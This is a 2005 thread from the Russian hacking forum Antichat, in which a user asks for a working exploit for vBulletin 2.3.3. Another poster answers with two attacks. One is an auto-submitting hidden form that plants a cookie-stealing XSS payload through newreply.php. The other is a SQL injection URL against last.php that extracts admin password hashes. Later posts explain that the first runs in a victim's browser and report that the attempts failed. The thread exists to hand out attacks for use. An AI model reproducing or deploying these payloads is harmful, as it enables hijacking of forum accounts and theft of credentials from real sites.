Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимости в vBulletin v2.3.3 (https://forum.antichat.xyz/showthread.php?t=8459)

SK | Heaton 01.08.2005 12:24

Уязвимости в vBulletin v2.3.3
 
Народ у ко нить есть реальный экплойт для vBulletin V2.3.3?!!!! Если есть по делитесь.. Плиз..

ProTeuS 01.08.2005 18:48

примеры сплойтов:

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

----------------------------------------------------

last.php?fsel=,user.password%20as%20title,user.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

----------------------------------------------------

SK | Heaton 02.08.2005 11:51

2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

ProTeuS 02.08.2005 14:32

Цитата:

Сообщение от SK | Heaton
2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

это не мой сплойт...но, как я понимаю, это форма для отправки мессаги, код которой будет исполняться в браузере жертвы

+ ты еще не заметил второй сплойт ниже, в старых версиях он может работать...

SK | Heaton 02.08.2005 14:59

2 ProTeuS сделал... че-то не получается !!!

GreenBear 02.08.2005 15:22

http://www.securitylab.ru/?ID=1671&S...ring=vBulletin

SK | Heaton 02.08.2005 15:45

Цитата:

Сообщение от Green_Bear

прикинь пробовал не получается....


Время: 02:21